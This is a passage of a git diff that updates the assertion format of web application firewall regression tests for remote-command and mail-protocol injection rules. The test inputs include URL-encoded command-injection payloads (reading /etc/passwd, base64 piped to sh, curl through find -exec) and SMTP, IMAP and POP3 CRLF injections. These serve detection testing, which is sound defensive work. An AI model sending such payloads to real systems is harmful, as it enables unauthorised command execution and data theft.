"HTTP/1.1" output: - no_log_contains: id "932250" + log: + no_expect_ids: [932250] - test_id: 5 desc: "Positive test: Unix Command Injection - ksh test" stages: @@ -84,7 +87,8 @@ tests: uri: "/get?code=ksh%20-c%20\"curl%20google.\"COM" version: HTTP/1.0 output: - log_contains: id "932250" + log: + expect_ids: [932250] - test_id: 6 desc: Arithmetic expansion '$(())' WAF evasion (mid command) stages: @@ -99,7 +103,8 @@ tests: uri: "/get?x=%24((7))z%20-wrapper%20sh,-c,curl%20google.com%20." version: "HTTP/1.1" output: - log_contains: id "932250" + log: + expect_ids: [932250] - test_id: 7 desc: "'ls' direct command injection" stages: @@ -114,7 +119,8 @@ tests: uri: "/get?x=ls%20-l%20/etc/passwd" version: "HTTP/1.1" output: - log_contains: id "932250" + log: + expect_ids: [932250] - test_id: 8 desc: "'ls' direct command injection (no flags)" stages: @@ -129,7 +135,8 @@ tests: uri: "/get?x=ls%20/etc/passwd" version: "HTTP/1.1" output: - log_contains: id "932250" + log: + expect_ids: [932250] - test_id: 9 desc: "'ls' direct command injection (no slashes)" stages: @@ -144,7 +151,8 @@ tests: uri: "/get?x=ls%20foo%20bar" version: "HTTP/1.1" output: - log_contains: id "932250" + log: + expect_ids: [932250] - test_id: 10 desc: "'ls' direct command injection FP test" stages: @@ -159,7 +167,8 @@ tests: uri: "/get?x=kills%20foo%20bar" version: "HTTP/1.1" output: - no_log_contains: id "932250" + log: + no_expect_ids: [932250] - test_id: 11 desc: "FP for 'sh' without word boundary" stages: @@ -174,7 +183,8 @@ tests: uri: "/get?show_comments_cookies_opt_in=true" version: "HTTP/1.1" output: - no_log_contains: id "932250" + log: + no_expect_ids: [932250] - test_id: 12 desc: "FP for 'ls' without word boundary in cookie header value" stages: @@ -190,7 +200,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - no_log_contains: id "932250" + log: + no_expect_ids: [932250] - test_id: 13 desc: "FP for '7z' without word boundary in cookie header value" stages: @@ -206,4 +217,5 @@ tests: uri: "/get" version: "HTTP/1.1" output: - no_log_contains: id "932250" + log: + no_expect_ids: [932250] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml index 600f3e6de..16c017ce0 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?932260-1=bash%20-c%20%22echo%20test%22" version: "HTTP/1.1" output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 2 stages: - input: @@ -32,7 +33,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 3 stages: - input: @@ -47,7 +49,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 4 stages: - input: @@ -62,7 +65,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 5 stages: - input: @@ -77,7 +81,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 6 stages: - input: @@ -92,7 +97,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 7 desc: "Unix Command Injection - python version bypass test" stages: @@ -108,7 +114,8 @@ tests: uri: "/get?cmd=python3.10%20cmd" version: HTTP/1.0 output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 8 desc: "Unix Command Injection - printf bypass test" stages: @@ -124,7 +131,8 @@ tests: uri: "/get?cmd=printf%20dW5hbWUgLWE=%7Cbase64%20-d%7Csh" version: HTTP/1.0 output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 9 desc: "Positive test: Data exfiltration with gunzip" stages: @@ -140,7 +148,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 10 desc: "Positive test: Data exfiltration with zstdcat" stages: @@ -156,7 +165,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 11 desc: "Positive test: Unix Command Injection - busybox test" stages: @@ -172,7 +182,8 @@ tests: uri: "/get?code=busybox%20-c%20%22echo%20hi%22" version: "HTTP/1.1" output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 12 desc: Remote Command Execution bypass with time stages: @@ -189,7 +200,8 @@ tests: uri: "/get?foo=time+bsdtar+" version: HTTP/1.1 output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 13 desc: Remote Command Execution bypass with time negative test stages: @@ -206,7 +218,8 @@ tests: uri: "/get?foo=time+warner+" version: HTTP/1.1 output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 14 desc: Remote Command Injection test for BB finding 935E1D91 stages: @@ -223,7 +236,8 @@ tests: uri: "/get?foo=time+curl+coreruleset.org" version: HTTP/1.1 output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 15 desc: Remote Command Injection test for BB finding 935E1D91 - time evasion attempt stages: @@ -240,7 +254,8 @@ tests: uri: "/get?foo=ti''me+curl+coreruleset.org" version: HTTP/1.1 output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 16 desc: System Command Injection test for BB finding AV6ZO3ZS - mixed case stages: @@ -257,7 +272,8 @@ tests: uri: "/get?foo='ZsTdcaT+/var/log/sensitive_log_file.zst" version: HTTP/1.1 output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 17 desc: "'find' direct command injection FP test" stages: @@ -272,7 +288,8 @@ tests: uri: "/get?x=find%20.%201%20-exec%20curl%20google.com%20\\;" version: "HTTP/1.1" output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 18 desc: "'find' direct command injection FP test" stages: @@ -287,7 +304,8 @@ tests: uri: "/get?x=find%20x%20for%20y" version: "HTTP/1.1" output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 19 desc: "'ping' direct command injection FP test" stages: @@ -302,7 +320,8 @@ tests: uri: "/get?x=ping%20127.0.0.1" version: "HTTP/1.1" output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 20 desc: "FP for 'head of'" stages: @@ -318,7 +337,8 @@ tests: data: "job_title=head%20of" version: "HTTP/1.1" output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 21 desc: "False positive test: 'evaluation' (FP while rule looks for 'eval')" stages: @@ -333,7 +353,8 @@ tests: uri: "/get?word=evaluation" version: "HTTP/1.1" output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 22 desc: "False positive test: 'schedule' (FP while rule looks for 'sched')" stages: @@ -348,7 +369,8 @@ tests: uri: "/get?word=schedule" version: "HTTP/1.1" output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 23 desc: "FP with word comment Github Issue #3387" stages: @@ -363,7 +385,8 @@ tests: uri: "/get?args=comment" version: HTTP/1.0 output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 24 desc: "FP against name 'Perlak' (matches 'perl')" stages: @@ -378,7 +401,8 @@ tests: uri: "/get?last_name=Perlak" version: HTTP/1.0 output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 25 desc: "FP against word 'Axel'" stages: @@ -393,7 +417,8 @@ tests: uri: "/get?first_name=Axel" version: HTTP/1.0 output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 26 desc: "FP with word performance" stages: @@ -408,7 +433,8 @@ tests: uri: "/get?args=performance" version: HTTP/1.0 output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 27 desc: "Block execution of perf command with arguments" stages: @@ -424,7 +450,8 @@ tests: data: "args=perf --version" version: HTTP/1.1 output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 28 desc: | Match despite quote evasion attempt. @@ -442,7 +469,8 @@ tests: uri: "/get?a=whoami;0'0'\"" version: HTTP/1.1 output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 29 desc: "FP against word 'Cronk'" stages: @@ -457,7 +485,8 @@ tests: uri: "/get?last_name=Cronk" version: HTTP/1.0 output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 30 desc: "Block ad-hoc ansible commands" stages: @@ -474,7 +503,8 @@ tests: data: | code=ansible all -m ping output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 31 desc: "Block ansible config dump command" stages: @@ -491,7 +521,8 @@ tests: data: | code=ansible-config dump output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 32 desc: "Block installing collections from ansible galaxy" stages: @@ -508,7 +539,8 @@ tests: data: | code=ansible-galaxy collection install community.general output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 33 desc: "Block ad-hoc ansible commands using ansible-console" stages: @@ -525,7 +557,8 @@ tests: data: | code=ansible-console output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 34 desc: "Block ansible-doc command" stages: @@ -542,7 +575,8 @@ tests: data: | code=ansible-doc plugin ping output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 35 desc: "Block dumping ansible inventory file and variables" stages: @@ -559,7 +593,8 @@ tests: data: | code=ansible-inventory --list output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 36 desc: "Block ansible pull from remote repository" stages: @@ -576,7 +611,8 @@ tests: data: | code=ansible-pull --url example.com output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 37 desc: "Block decrypting ansible secrets" stages: @@ -593,7 +629,8 @@ tests: data: | code=ansible-vault decrypt secret output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 38 desc: "Block execution of ansible playbooks" stages: @@ -610,7 +647,8 @@ tests: data: | code=ansible-playbook site.yml output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 39 desc: "Block decryption of secrets with chef-vault" stages: @@ -627,7 +665,8 @@ tests: data: | code=chef-vault -i secret output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 40 desc: "Block execution of chef-shell command" stages: @@ -644,7 +683,8 @@ tests: data: | code=chef-shell output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 41 desc: "Block execution chef recipie book" stages: @@ -661,7 +701,8 @@ tests: data: | code=chef-run all recipie.rb output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 42 desc: "Block execution chef recipie book against a specific node" stages: @@ -678,7 +719,8 @@ tests: data: | code=chef-client -t 1.1.1.1 output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 43 desc: "Block execution of visudo" stages: @@ -695,7 +737,8 @@ tests: data: | code=visudo output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 44 desc: "Block execution of CrowdSec cscli" stages: @@ -712,7 +755,8 @@ tests: data: | code=cscli alerts list output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 45 desc: "Test for false positive with name Axel Smith" stages: @@ -729,4 +773,5 @@ tests: data: | name=Axel Smith output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml index 286396e92..d7c20aa4a 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?attackme=%0d%0aMAIL%20FROM%3A%3Ca%40b.com%3E" version: HTTP/1.0 output: - log_contains: id "932300" + log: + expect_ids: [932300] - test_id: 2 desc: "SMTP MAIL FROM Command Injection true negative test" stages: @@ -33,7 +34,8 @@ tests: uri: "/get?text=We%20received%20this%20mail%20from%20Mars" version: HTTP/1.0 output: - no_log_contains: id "932300" + log: + no_expect_ids: [932300] - test_id: 3 desc: "SMTP Command Injection negative test 2" stages: @@ -50,7 +52,8 @@ tests: textarea=Hello%21%20We%20finally%20received%20this%20mail%20from%3A%3Ctest%40coreruleset.org%3E%2C%20which%20means%20that%20we%20can%20do%20this%20finally. version: HTTP/1.0 output: - no_log_contains: id "932300" + log: + no_expect_ids: [932300] - test_id: 4 desc: "SMTP EHLO Command injection positive test" stages: @@ -65,7 +68,8 @@ tests: uri: "/get?attackme=%0d%0aEHLO%20test.com" version: HTTP/1.0 output: - log_contains: id "932300" + log: + expect_ids: [932300] - test_id: 5 desc: "SMTP Command EHLO Injection negative test using ehlo typo in text" stages: @@ -82,7 +86,8 @@ tests: textarea=Hello%21%20This%20text%20introduces%20a%20typo%20when%20saying%20%22hello%22%20so%20we%20say%20ehlo%3A%20coreruleset.org%20to%20all%21 version: HTTP/1.0 output: - no_log_contains: id "932300" + log: + no_expect_ids: [932300] - test_id: 6 desc: "SMTP RCPT TO Command injection positive test" stages: @@ -97,7 +102,8 @@ tests: uri: "/get?attackme=%0d%0aRCPT%20TO%3A%3CPostmaster%3E" version: HTTP/1.0 output: - log_contains: id "932300" + log: + expect_ids: [932300] - test_id: 7 desc: "SMTP RCPT TO Command Injection true negative test" stages: @@ -114,7 +120,8 @@ tests: textarea=Hello%21%20This%20text%20introduces%20a%20typo%20when%20saying%20%22receipt%20to%22%20so%20we%20say%20rcpt%20to%3A%20%3Ccoreruleset.org%3E version: HTTP/1.0 output: - no_log_contains: id "932300" + log: + no_expect_ids: [932300] - test_id: 8 desc: "SMTP VRFY TO Command injection positive test" stages: @@ -129,7 +136,8 @@ tests: uri: "/get?attackme=%0d%0aRCPT%20TO%3A%3CPostmaster%3E" version: HTTP/1.0 output: - log_contains: id "932300" + log: + expect_ids: [932300] - test_id: 9 desc: "SMTP Command Injection Full SMTP dialog negative test" stages: @@ -146,4 +154,5 @@ tests: textarea=S%3A%20220%20foo.com%20Simple%20Mail%20Transfer%20Service%20Ready%0AC%3A%20EHLO%20bar.com%0AS%3A%20250-foo.com%20greets%20bar.com%0AS%3A%20250-8BITMIME%0AS%3A%20250-SIZE%0AS%3A%20250-DSN%0AS%3A%20250%20HELP%0AC%3A%20MAIL%20FROM%3A%3CSmith%40bar.com%3E%0AS%3A%20250%20OK%0AC%3A%20RCPT%20TO%3A%3CJones%40foo.com%3E%0AS%3A%20250%20OK%0AC%3A%20RCPT%20TO%3A%3CGreen%40foo.com%3E%0AS%3A%20550%20No%20such%20user%20here%0AC%3A%20RCPT%20TO%3A%3CBrown%40foo.com%3E%0AS%3A%20250%20OK%0AC%3A%20DATA%0AS%3A%20354%20Start%20mail%20input%3B%20end%20with%20%3CCRLF%3E.%3CCRLF%3E%0AC%3A%20Blah%20blah%20blah...%0AC%3A%20...etc.%20etc.%20etc.%0AC%3A%20.%0AS%3A%20250%20OK%0AC%3A%20QUIT%0AS%3A%20221%20foo.com%20Service%20closing%20transmission%20channel version: HTTP/1.0 output: - no_log_contains: id "932300" + log: + no_expect_ids: [932300] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml index b31ecc86d..ba80b3424 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?test=%0d%0aDATA" version: HTTP/1.0 output: - log_contains: id "932301" + log: + expect_ids: [932301] - test_id: 2 desc: "SMTP DATA Command Injection true negative test" stages: @@ -33,7 +34,8 @@ tests: uri: "/get?text=We%20need%20that%20data%20now" version: HTTP/1.0 output: - no_log_contains: id "932301" + log: + no_expect_ids: [932301] - test_id: 3 desc: "SMTP Command Injection negative test 2" stages: @@ -50,7 +52,8 @@ tests: textarea=Hello%21%20World.%0adata%20not%20found. version: HTTP/1.0 output: - no_log_contains: id "932301" + log: + no_expect_ids: [932301] - test_id: 4 desc: "SMTP QUIT Command injection positive test" stages: @@ -65,7 +68,8 @@ tests: uri: "/get?attackme=%0d%0aQUIT" version: HTTP/1.0 output: - log_contains: id "932301" + log: + expect_ids: [932301] - test_id: 5 desc: "SMTP Command QUIT Injection negative test" stages: @@ -82,7 +86,8 @@ tests: textarea=Hey%20please%20do%20not%20quit version: HTTP/1.0 output: - no_log_contains: id "932301" + log: + no_expect_ids: [932301] - test_id: 6 desc: "SMTP HELP Command injection positive test" stages: @@ -97,7 +102,8 @@ tests: uri: "/get?attackme=%0d%0aHELP%20Postmaster" version: HTTP/1.0 output: - log_contains: id "932301" + log: + expect_ids: [932301] - test_id: 7 desc: "SMTP HELP Command Injection true negative test" stages: @@ -114,4 +120,5 @@ tests: textarea=Hello%21%20This%20text%20needs%20help%20now version: HTTP/1.0 output: - no_log_contains: id "932301" + log: + no_expect_ids: [932301] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml index e9e010ae2..12a1676a0 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml @@ -20,7 +20,8 @@ tests: textarea=%0D%0AA003%20APPEND%20saved-messages%20(%5CSeen)%20%7B310%7D%0D%0A%20Date%3A%20Mon%2C%207%20Feb%201994%2021%3A52%3A25%20-0800%20(PST)%0D%0A%20From%3A%20Test%20CRS%20%3Ctest%40coreruleset.org%3E%0D%0A%20Subject%3A%20Appending%0D%0A%20To%3A%20test%40coreruleset.org%0D%0A%20Message-Id%3A%20%3CB27397-0100000%40coreruleset.org%3E%0D%0A%20MIME-Version%3A%201.0%0D%0A%20Content-Type%3A%20TEXT%2FPLAIN%3B%20CHARSET%3DUS-ASCII%0D%0A%20%0D%0A%20Hello%20World%2C%20can%20I%20append%3F version: HTTP/1.0 output: - log_contains: id "932310" + log: + expect_ids: [932310] - test_id: 2 desc: "IMAP APPEND Command Injection negative test" stages: @@ -35,7 +36,8 @@ tests: uri: "/get?text=I%20wanted%20to%20append%20something%20%28annoying%29%20%7Bclosed%7D" version: HTTP/1.0 output: - no_log_contains: id "932310" + log: + no_expect_ids: [932310] - test_id: 3 desc: "IMAP AUTHENTICATE Command injection positive test" stages: @@ -52,7 +54,8 @@ tests: textarea=%0D%0Aa001%20authenticate%20PLAIN%0D%0A version: HTTP/1.0 output: - log_contains: id "932310" + log: + expect_ids: [932310] - test_id: 4 desc: "IMAP AUTHENTICATE Command Injection negative test" stages: @@ -67,7 +70,8 @@ tests: uri: "/get?text=Cannot%20authenticate%20anyways" version: HTTP/1.0 output: - no_log_contains: id "932310" + log: + no_expect_ids: [932310] - test_id: 5 desc: "IMAP STATUS Command injection positive test" # STATUS [a-zA-Z0-9\"\./%\*&]+? (?:\((UNSEEN|UIDNEXT|MESSAGES|UIDVALIDITY|RECENT| )+\))? @@ -85,7 +89,8 @@ tests: textarea=%0D%0Aa001%20STATUS%20INBOX%20(MESSAGES) version: HTTP/1.0 output: - log_contains: id "932310" + log: + expect_ids: [932310] - test_id: 6 desc: "IMAP STATUS Command Injection negative test" stages: @@ -100,7 +105,8 @@ tests: uri: "/get?text=Please%20send%20me%20an%20update%20status%20all%20messages%20are%20being%20denied" version: HTTP/1.0 output: - no_log_contains: id "932310" + log: + no_expect_ids: [932310] - test_id: 7 desc: "IMAP UID Command injection positive test" # UID (COPY|FETCH|STORE) [0-9,:\*]+? @@ -118,7 +124,8 @@ tests: textarea=%0D%0Aa001%20uid%20store%20231%3A233%0D%0A version: HTTP/1.0 output: - log_contains: id "932310" + log: + expect_ids: [932310] - test_id: 8 desc: "IMAP UID Command Injection negative test" stages: @@ -133,4 +140,5 @@ tests: uri: "/get?text=The%20uid%20is%020not%020working" version: HTTP/1.0 output: - no_log_contains: id "932310" + log: + no_expect_ids: [932310] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml index 841205b7e..2ab494b9c 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?attackme=%0d%0aa001%20EXAMINE%20INBOX" version: HTTP/1.0 output: - log_contains: id "932311" + log: + expect_ids: [932311] - test_id: 2 desc: "IMAP CREATE/DELETE/EXAMINE/SELECT/SUBSCRIBE/UNSUBSCRIBE Command Injection true negative test" stages: @@ -34,7 +35,8 @@ tests: uri: "/get?text=We%examine%20this%20mail%20from%20Mars" version: HTTP/1.0 output: - no_log_contains: id "932311" + log: + no_expect_ids: [932311] - test_id: 3 desc: "IMAP COPY Command Injection positive test" stages: @@ -51,7 +53,8 @@ tests: textarea=%0d%0aa002%20copy%202%3A4%20MEETING version: HTTP/1.0 output: - log_contains: id "932311" + log: + expect_ids: [932311] - test_id: 4 desc: "IMAP COPY Command Injection negative test" stages: @@ -68,7 +71,8 @@ tests: textarea=Just%20to%20remind%20you%20that%20I%20need%20to%20copy%20those%20documents version: HTTP/1.0 output: - no_log_contains: id "932311" + log: + no_expect_ids: [932311] - test_id: 5 desc: "IMAP LIST Command Injection positive test" stages: @@ -85,7 +89,8 @@ tests: textarea=%0d%0aA1%20list%20%22INBOX%2F%22%20%22%2A%22 version: HTTP/1.0 output: - log_contains: id "932311" + log: + expect_ids: [932311] - test_id: 6 desc: "IMAP LIST Command Injection negative test" stages: @@ -102,7 +107,8 @@ tests: textarea=We%20need%20the%20list%20%22ASAP%22 version: HTTP/1.0 output: - no_log_contains: id "932311" + log: + no_expect_ids: [932311] - test_id: 7 desc: "IMAP STORE Command Injection positive test" stages: @@ -119,7 +125,8 @@ tests: textarea=%0d%0ad%20store%202%20%2BFLAGS%20%28%5CDeleted%29 version: HTTP/1.0 output: - log_contains: id "932311" + log: + expect_ids: [932311] - test_id: 8 desc: "IMAP STORE Command Injection negative test" stages: @@ -136,7 +143,8 @@ tests: textarea=%0aLet%27s%20go%20to%20the%20store%20%28sale%20time%21%29 version: HTTP/1.0 output: - no_log_contains: id "932311" + log: + no_expect_ids: [932311] - test_id: 9 desc: "IMAP SEARCH Command Injection positive test" stages: @@ -153,7 +161,8 @@ tests: textarea=%0d%0aA282%20SEARCH%20FLAGGED%20SINCE%201-Feb-1994%20NOT%20FROM%20%22Smith%22 version: HTTP/1.0 output: - log_contains: id "932311" + log: + expect_ids: [932311] - test_id: 10 desc: "IMAP SEARCH with CHARSET Command Injection positive test" stages: @@ -170,7 +179,8 @@ tests: textarea=%0d%0aZ001%20SEARCH%20CHARSET%20WINDOWS-1252%20DELETED%20SINCE%201-Feb-1994 version: HTTP/1.0 output: - log_contains: id "932311" + log: + expect_ids: [932311] - test_id: 11 desc: "IMAP SEARCH using TEXT Command Injection positive test" stages: @@ -187,7 +197,8 @@ tests: textarea=%0d%0aA283%20SEARCH%20TEXT%20%22string%20not%20in%20mailbox%22 version: HTTP/1.0 output: - log_contains: id "932311" + log: + expect_ids: [932311] - test_id: 12 desc: "IMAP SEARCH using CHARSET and range Command Injection positive test" stages: @@ -204,7 +215,8 @@ tests: textarea=%0d%0aA284%20SEARCH%20CHARSET%20UTF-8%20TEXT%20%7B6%7D version: HTTP/1.0 output: - log_contains: id "932311" + log: + expect_ids: [932311] - test_id: 13 desc: "IMAP SEARCH Command Injection negative test" stages: @@ -221,4 +233,5 @@ tests: textarea=In%20all%20search%20keys%20that%20use%20strings%2C%20a%20message%20matches%20the%20key%20if%20the%20string%20is%20a%20substring%20of%20the%20field.%20%20The%20matching%20is%20case-insensitive. version: HTTP/1.0 output: - no_log_contains: id "932311" + log: + no_expect_ids: [932311] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml index ac2fcaab7..248e5e706 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?attackme=%0d%0aRETR%20123" version: HTTP/1.0 output: - log_contains: id "932320" + log: + expect_ids: [932320] - test_id: 2 desc: "POP3 RETR Command Injection negative test" stages: @@ -33,7 +34,8 @@ tests: uri: "/get?text=Let%20me%20retrieve%2010%20of%20those" version: HTTP/1.0 output: - no_log_contains: id "932320" + log: + no_expect_ids: [932320] - test_id: 3 desc: "POP3 DELE Command Injection negative test" stages: @@ -50,7 +52,8 @@ tests: textarea=We%20should%20delete%20nine version: HTTP/1.0 output: - no_log_contains: id "932320" + log: + no_expect_ids: [932320] - test_id: 4 desc: "POP3 LIST Command injection positive test" stages: @@ -65,7 +68,8 @@ tests: uri: "/get?attackme=%0d%0alist%203" version: HTTP/1.0 output: - log_contains: id "932320" + log: + expect_ids: [932320] - test_id: 5 desc: "POP3 LIST Command Injection negative test" stages: @@ -82,7 +86,8 @@ tests: textarea=This%20text%20is%20a%20way%20of%20list%203%20things version: HTTP/1.0 output: - no_log_contains: id "932320" + log: + no_expect_ids: [932320] - test_id: 6 desc: "POP3 TOP Command injection positive test" stages: @@ -97,7 +102,8 @@ tests: uri: "/get?attackme=%0d%0aTOP%201%202" version: HTTP/1.0 output: - log_contains: id "932320" + log: + expect_ids: [932320] - test_id: 7 desc: "POP3 TOP Command Injection true negative test" stages: @@ -114,7 +120,8 @@ tests: textarea=These%20are%20top%10%20rules version: HTTP/1.0 output: - no_log_contains: id "932320" + log: + no_expect_ids: [932320] - test_id: 8 desc: "POP3 AUTH Command injection positive test" stages: @@ -129,7 +136,8 @@ tests: uri: "/get?attackme=%0d%0aAUTH%20corerulest%20dGhpc2lzIWF0ZXN0cGFzc3dvcmQ=" version: HTTP/1.0 output: - log_contains: id "932320" + log: + expect_ids: [932320] - test_id: 9 desc: "POP3 AUTH Command Injection negative test" stages: @@ -146,7 +154,8 @@ tests: textarea=Hey%2C%20sent%20me%20those%20auth%20codes%20please! version: HTTP/1.0 output: - no_log_contains: id "932320" + log: + no_expect_ids: [932320] - test_id: 10 desc: "POP3 APOP Command injection positive test" stages: @@ -161,7 +170,8 @@ tests: uri: "/get?attackme=%0d%0aAPOP%20corerulest%207d0a3bd8e5b2abcfb3e256633c23b891" version: HTTP/1.0 output: - log_contains: id "932320" + log: + expect_ids: [932320] - test_id: 11 desc: "POP3 APOP Command Injection negative test" stages: @@ -178,4 +188,5 @@ tests: textarea=Look%2C%20apop%20star! version: HTTP/1.0 output: - no_log_contains: id "932320" + log: + no_expect_ids: [932320] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml index d5afc429e..81edbfea9 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?attackme=%0d%0aQUIT" version: HTTP/1.0 output: - log_contains: id "932321" + log: + expect_ids: [932321] - test_id: 2 desc: "POP3 QUIT Command Injection negative test" stages: @@ -33,7 +34,8 @@ tests: uri: "/get?text=Don't%20quit" version: HTTP/1.0 output: - no_log_contains: id "932321" + log: + no_expect_ids: [932321] - test_id: 3 desc: "POP3 CAPA Command Injection negative test 2" stages: @@ -50,7 +52,8 @@ tests: textarea=we%20do%20not%20have%20that%20capability version: HTTP/1.0 output: - no_log_contains: id "932321" + log: + no_expect_ids: [932321] - test_id: 4 desc: "POP3 STAT Command Injection negative test" stages: @@ -67,7 +70,8 @@ tests: textarea=Hi%20lestat! version: HTTP/1.0 output: - no_log_contains: id "932321" + log: + no_expect_ids: [932321] - test_id: 5 desc: "POP3 NOOP Command injection negative test" stages: @@ -82,7 +86,8 @@ tests: uri: "/get?attackme=%0aSeriously%2C%20noop" version: HTTP/1.0 output: - no_log_contains: id "932321" + log: + no_expect_ids: [932321] - test_id: 6 desc: "POP3 RSET Command Injection negative test" stages: @@ -99,4 +104,5 @@ tests: textarea=Someone%20bought%20this%20nice%20lerset version: HTTP/1.0 output: - no_log_contains: id "932321" + log: + no_expect_ids: [932321] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml index 5ddf01bf4..fb3b2d645 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml @@ -18,4 +18,5 @@ tests: uri: "/get?rce=!-1!-2" version: HTTP/1.0 output: - log_contains: id "932330" + log: + expect_ids: [932330] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml index c9e823dee..f147a23d5 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?rce=!1" version: HTTP/1.0 